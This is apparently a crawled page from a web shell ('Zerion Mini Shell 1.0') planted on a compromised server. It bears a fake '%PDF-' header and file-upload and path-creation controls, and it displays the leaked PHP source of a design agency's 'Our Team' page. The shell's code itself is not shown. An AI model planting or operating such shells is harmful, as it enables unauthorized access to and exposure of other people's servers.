%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/home/eirtvhdf/public_html/about/
Upload File :
Create Path :
Current File : //proc/self/root/home/eirtvhdf/public_html/about/our_team.php

<!DOCTYPE html>
<html lang="en">
<head>
  <title>EirTechs > Ranked#1 Design Company</title>
    <meta charset="utf-8">
    <meta name="description" content="EirfoTech is a worldwide tech agency specializing in user-centered design, strong client collaboration, digital marketing and unparalleled customer support. - 100% Satisfied Clients - Contact Us: 087-386-4833">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="keywords" content="Custom Logo Design, Custom Web Design, Mobile Applications, Software Development, Corporate Branding, Digital Marketing">
  <script src="https://kit.fontawesome.com/a076d05399.js"></script>
  <link rel="icon" href="<?php echo $serverName; ?>../assets/images/favicon.png" type="image/x-icon" />
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css">
  <!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> -->
  <link rel="stylesheet" href="../assest/css/main.css">

  <!-- <meta http-equiv="refresh" content="1"> -->
</head>
<body>
        <?php
require("../get.php");
?>

<header>
  <nav id="navbar" class="navbar customnav navbar-expand-md navbar-light p-0 dropshadow d-block">
        <!-- Toggler/collapsibe Button -->
        <div class="m-0 row m-0">
          <button class="navbar-toggler ml-3 my-1 p-1 px-2" type="button" data-toggle="collapse" data-target="#collapsibleNavbar">
            <span class="navbar-toggler-icon"></span>
          </button>
          <!-- Brand -->
          <a class="p-0 pl-3 col" href="../index.php">
            <img src="../assest/image/logo.png" class="navbar-brand" alt="">
          </a>
          
          <ul class="collapse navbar-collapse navbar-nav second_nav justify-content-end" id="collapsibleNavbar">
            <li class="nav-item">
              <a href="../index.php" class="nav-link">Home</a>
            </li>
         <!--   <li class="nav-item dropdown">
              <a href="#!" class="nav-link">Services</a>
              <div class="dropdown-menu dropshadow">
                  <a class="dropdown-item" href="<?php echo $serverName; ?>../service/corporate-branding/logo_design.php">Logo Design</a>
                <a class="dropdown-item" href="../service/mobile_application.php">Mobile Application</a>
                <a class="dropdown-item" href="../service/software_development.php">Software Development</a>
                <a class="dropdown-item" href="../service/web&cms_development.php">Web & CMS Development</a>
                <a class="dropdown-item" href="../service/corporate_branding.php">Corporate Branding</a>
                <a class="dropdown-item" href="../service/digital_marketing.php">Digital Marketing</a>
                <div class="dropdown-divider"></div>
              </div>
            </li> -->
            <li class="nav-item dropdown">
              <a href="#!" class="nav-link">Expertise</a>
              <div class="dropdown-menu dropshadow">
                <a class="dropdown-item" href="../expertise/strategy.php">Strategy</a>
                <a class="dropdown-item" href="../expertise/design.php">Design</a>
                <a class="dropdown-item" href="../expertise/development.php">Development</a>
                <a class="dropdown-item" href="../expertise/marketing.php">Marketing</a>
                <a class="dropdown-item" href="../expertise/post_launch.php">Post-Launch</a>
                <div class="dropdown-divider"></div>
              </div>
            </li>
          <!--  <li class="nav-item dropdown">
              <a href="#!" class="nav-link">About</a>
              <div class="dropdown-menu dropshadow">
                <a class="dropdown-item" href="../about/the_company.php">The Company</a>
                <a class="dropdown-item" href="../about/our_team.php">Our Team</a>
                <a class="dropdown-item" href="../about/clients.php">Clients</a>
                <a class="dropdown-item" href="../about/testimonials.php">Testimonials</a>
                <div class="dropdown-divider"></div>
              </div>
            </li> -->
            <li class="nav-item">
              <a class="nav-link" href="../about/the_company.php">The Company</a>
            </li>
             <li class="nav-item">
              <a class="nav-link" href="../about/our_team.php">Our Team</a>
            </li>
             <li class="nav-item">
              <a class="nav-link" href="../about/clients.php">Clients</a>
            </li>
            <li class="nav-item"><a href="<?php echo $serverName; ?>about/partners.php" class="nav-link">Partners - Joint Venture</a></li>
            <li class="nav-item cta">  <a target="_blank" href="https://crm.eirtechs.com/" class="nav-link"><span>Login</span></a> </li>
            <!-- <li class="nav-item">
              <a class="nav-link" href="../contact.php">Contact</a>
            </li> -->
          </ul>
          
          <!-- <div class="d-sm-flex align-self-center d-none contact_text mr-3">
            <a href="https://EirfoTech.ie/contact.php" class="text-light"> Contact Us</a> &nbsp; <i class="d-lg-block d-none mx-1">|</i><span class="d-none d-lg-block"> &nbsp; <i class="fa fa-phone mt-2"></i>&nbsp;&nbsp;Call Us +353 (87) 386-4833</span>
          </div> -->
          <div class="p-0 justify-content-end d-flex float-right">
            <button class="primary-r-gradient nav-reqbtn float-right">Request Info</button>
          </div>
        </div>
    </nav>
    
    <div class="banner">
      <img src="../assest/image/slider/a2.jpg" class="bg-danger" alt="" width="100%">
      <div class="banner-caption">
        <h3>Respecting & believing our team is our key to success</h3>
      </div>
    </div>
</header>
<div class=" primary-r-gradient2">
<div class="container justify-content-center d-flex py-3">
  <div class="col-lg-9 col-12 text-center">
    <h1 class="pt-4 text-center text-white" style="font-size: 50px; font-weight: bold;">Our <i style="font-family: none;font-weight: normal; color: rgba(255,255,255,0.5);"></i><span class="text-secondary">Professionals </span></h1>
    <p style="font-size: 18px; color: white;">EirfoTech has a team of smart and specialized people. With the integration of cutting-edge technology knowledge, we are able to stay on top of all our offerings.</p>
  </div>
</div>
</div>
<div class="cardpanel3">
  <div class="container p-5 justify-content-center">
    <h1 class="text-primary text-center mb-3"><b>Our Core <i style="font-family: none;font-weight: normal; color: grey;">values </i><span style="color: black"></span></b></h1>
    <!-- <p class="text-center" style="font-size: 18px;"></p> -->
    <div class="row justify-content-center">
      <div class="col-12 col-lg-4 col-md-6 mt-3">
        <div class="card3 rounded">
          <img src="../assest/image/Rockface-Team-Building.jpg" alt="">
          <div class="card_text">
            <h4>High Integrity</h4>
            <p>We maintain our high beliefs and expertise throughout the process, and place great emphasis on integrity and respect.</p>
          </div>
        </div>
      </div>
      <div class="col-12 col-lg-4 col-md-6 mt-3">
        <div class="card3 rounded">
          <img src="../assest/image/card11.jpg" alt="">
          <div class="card_text">
            <h4>Give Back</h4>
            <p>We focus on transforming the businesses we serve into better places through real interactions and CSR tests.</p>
          </div>
        </div>
      </div>
      <div class="col-12 col-lg-4 col-md-6 mt-3">
        <div class="card3 rounded">
          <img src="../assest/image/happyemployee-pano_14576.jpg" alt="">
          <div class="card_text">
            <h4>Be Tenacious</h4>
            <p>You Can Do It And You Will Do It. We strive to get the best and most genuine feedback from our customers instead of quick fixes that are easy or less expensive.</p>
          </div>
        </div>
      </div>
      <div class="col-12 col-lg-4 col-md-6 mt-3">
        <div class="card3 rounded">
          <img src="../assest/image/socialinsigh.jpg" alt="">
          <div class="card_text">
            <h4>Choose Joy </h4>
            <p>We hope to maintain an atmosphere of gratitude and openness. What’s more, our customers love the way we work.</p>
          </div>
        </div>
      </div>
      <div class="col-12 col-lg-4 col-md-6 mt-3">
        <div class="card3 rounded">
          <img src="../assest/image/trusted_org.png" alt="">
          <div class="card_text">
            <h4>Dream Big </h4>
            <p>We give clients the lifestyle they once wanted. In addition to solutions, we offer a gateway to success.</p>
          </div>
        </div>
      </div>
      <div class="col-12 col-lg-4 col-md-6 mt-3">
        <div class="card3 rounded">
          <img src="../assest/image/puzzle.jpg" alt="">
          <div class="card_text">
            <h4>Diversity Rules</h4>
            <p>We love working with a variety of lifestyles and backgrounds while promoting free exchange of ideas and ideas.</p>
          </div>
        </div>
      </div>
    </div>  
  </div>
</div>

<div class="row m-0 blog_career">
  <div class="col-12 col-md-6 blog">
    <img src="../assest/image/connected customer.jpg" alt="">
    <p>EirfoTech helps you to stay updated with the ongoing trends of the digital world. Read our blog to stay connected</p>
    <button class="btn secondary-r-gradient text-light">READ OUR BLOGS</button>
  </div>
  <div class="col-12 col-md-6 career">
    <img src="../assest/image/laptop-working-activity-adult.jpg" alt="">
    <h3>Careers</h3>
    <P>EirfoTech is a one-stop solution to growing businesses and communities.</P>
    <span>#EirfoTechCares</span><br><br>
    <button class="btn secondary-r-gradient text-light">LEARN MORE</button>
  </div>
</div>

<!--
<div class="strip2 primary-r-gradient">
  <div class="container p-4">
    <div class="row justify-content-center">
      <div class="col-lg-4 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><p><span>Ready to</span> <br>discuss your project?</p></div>
      <div class="col-lg-3 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><button class="text-primary dropshadow">Request Info</button></div>
      <div class="col-lg-4 col-md-4 col-12 mb-md-0 mb-3 panel3 d-flex"><img src="../assest/image/phone_icon.svg" alt=""><a style="color:white" href="javascript:void(0)" onclick="window.location='tel:0873864833'" class="external"><p><b><u>087-386-4833</u></b></a><br>Call Us Anytime</p></div>
    </div>
  </div>
</div> -->
<div class="bg-light">
<div class="container company_logo">
  <div class="row p-5">
    <div class="col-12 col-md-6 p-5 text-center align-self-center left_side">
      <h1><b style="color:#4a419e;">Loved</b> & <b style="color:#73226e;">Trusted</b></h1>
      <h2>by the industry leaders</h2>
    </div>
    <div class="col-12 col-md-6 right_side">
      <div class="row justify-content-center custom_row">
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/California Department of Insurance Logo.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/FIG.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/boxing.png"></div>
      </div>
      <div class="row justify-content-center custom_row">
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/GG.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/JVC.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/LG.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/Michael_Kors_(brand)_logo.svg.png"></div>
      </div>
      <div class="row justify-content-center custom_row">
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/Qatar-Airways.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/Suzuki.png"></div>
        <div class="col-3 p-0 complogo" data-img="../assets/images/logos/Walmart-logo.png"></div>
      </div>
    </div>

  </div>
</div>
</div>


<?php require("../inc/footer2.php"); ?>
  <section class="req_form justify-content-center">
<div class="position-absolute h-100 w-100 closebtn"></div>
<div class="strip1 secondary-r-gradient col-lg-4 col-md-6 col-sm-10 col-12 p-0 align-self-center">
  <h2 class="col-12">Let's build <b>somthing great</b> together! <i class="fa fa-times closebtn"></i></h2>
  <div class="container p-4">
    <form method="post" class="form-row justify-content-end align-self-center">
      <div class="form-group col-12">
        <input type="text" name="name" class="form-control my_input" placeholder="Name *" required>
      </div>
      <div class="form-group col-12">
        <input type="email" name="email" class="form-control my_input" placeholder="Email *" required>
      </div>
      <div class="form-group col-12">
        <div class="input-group">
          <select id="" name="code" class="custom-select col-4">
                      <option selected><?php echo $ipdat->geoplugin_countryCode.' ('.$ipdat2.')'; ?></option>
                      <option data-countryCode="DZ" value="DZ (+213)">DZ (+213)</option>

                		<option data-countryCode="AR" value="AR (+54)">AR (+54)</option>
                	
                		<option data-countryCode="AU" value="AU (+61)">AU (+61)</option>
                		<option data-countryCode="AT" value="AT (+43)">AT (+43)</option>
                		<option data-countryCode="AZ" value="AZ (+994)">AZ (+994)</option>
                	
                		<option data-countryCode="BD" value="BD (+880)">BD (+880)</option>
                		
                		<option data-countryCode="BE" value="BE (+32)">BE (+32)</option>
                		
                		<option data-countryCode="BR" value="BR (+55)">BR (+55)</option>
                		
                		<option data-countryCode="CA" value="CA (+1)">CA (+1)</option>
                	
                		<option data-countryCode="CN" value="CN (+86)">CN (+86)</option>
                	
                		<option data-countryCode="EG" value="EG (+20)">EG (+20)</option>
                	
                		<option data-countryCode="FJ" value="FJ (+679)">FJ (+679)</option>
                		<option data-countryCode="FI" value="FI (+358)">FI (+358)</option>
                		<option data-countryCode="FR" value="FR (+33)">FR (+33)</option>
                		
                		<option data-countryCode="DE" value="DE (+49)">DE (+49)</option>
                		
                		<option data-countryCode="GR" value="GR (+30)">GR (+30)</option>
                		<option data-countryCode="GL" value="GL (+299)">GL (+299)</option>
                	
                		<option data-countryCode="HK" value="HK (+852)">HK (+852)</option>
                		<option data-countryCode="PK" value="PK (+92)">PK (+92)</option>
                		
                		<option data-countryCode="IS" value="IS (+354)">IS (+354)</option>
                		<option data-countryCode="IN" value="IN (+91)">IN (+91)</option>
                		<option data-countryCode="ID" value="ID (+62)">ID (+62)</option>
                		<option data-countryCode="IR" value="IR (+98)">IR (+98)</option>
                		<option data-countryCode="IQ" value="IQ (+964)">IQ (+964)</option>
                		<option data-countryCode="IE" value="IE (+353)">IE (+353)</option>
                		
                		<option data-countryCode="JP" value="JP (+81)">JP (+81)</option>
                	
                		<option data-countryCode="KW" value="KW (+965)">KW (+965)</option>
                	
                		<option data-countryCode="MY" value="MY (+60)">MY (+60)</option>
                		<option data-countryCode="MV" value="MV (+960)">MV (+960)</option>
                		
                		<option data-countryCode="MX" value="MX (+52)">MX (+52)</option>
                	
                		<option data-countryCode="NP" value="NP (+977)">NP (+977)</option>
                		<option data-countryCode="NL" value="NL (+31)">NL (+31)</option>
                		
                		<option data-countryCode="NG" value="NG (+234)">NG (+234)</option>
                		
                		<option data-countryCode="NO" value="NO (+47)">NO (+47)</option>
                		<option data-countryCode="OM" value="OM (+968)">OM (+968)</option>
                	
                		<option data-countryCode="PL" value="PL (+48)">PL (+48)</option>
                		<option data-countryCode="PT" value="PT (+351)">PT (+351)</option>
                		
                		<option data-countryCode="QA" value="QA (+974)">QA (+974)</option>
                	
                		<option data-countryCode="RU" value="RU (+7)">RU (+7)</option>
                	
                		<option data-countryCode="SA" value="SA (+966)">SA (+966)</option>
                	
                		<option data-countryCode="SG" value="SG (+65)">SG (+65)</option>
                	
                		<option data-countryCode="ZA" value="ZA (+27)">ZA (+27)</option>
                		<option data-countryCode="ES" value="ES (+34)">ES (+34)</option>
                		<option data-countryCode="LK" value="LK (+94)">LK (+94)</option>
                	
                		<option data-countryCode="SE" value="SE (+46)">SE (+46)</option>
                		<option data-countryCode="CH" value="CH (+41)">CH (+41)</option>
                	
                		<option data-countryCode="TH" value="TH (+66)">TH (+66)</option>
                		
                		<option data-countryCode="TR" value="TR (+90)">TR (+90)</option>
                	
                		<option data-countryCode="AE" value="AE (+971)">AE (+971)</option>
                		
                		 <option data-countryCode="US" value="US (+1)">US (+1)</option>
                
                	
                		<option data-countryCode="ZW" value="ZW (+263)">ZW (+263)</option>
                    </select>
          <input type="number" name="phone" class="form-control my_input col-9" placeholder="Phone Number" required>
        </div>
      </div>
      <div class="form-group col-12">
        <textarea name="message" id="" class="form-control my_input" placeholder="Message and suitable time for call *" required></textarea>
      </div>
      
      <div class="form-group col-12">
              <input type="hidden" id="token" name="token">
                </div>
      
      <div class="form-group my_input">
        <button type="submit" name="submit" class="form-control text-primary">Submit</button>
      </div>
    </form>
  </div>
</div>
</section>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js"></script>

<script src="../assest/javascript/main.js"></script>
</body>
</html>

Zerion Mini Shell 1.0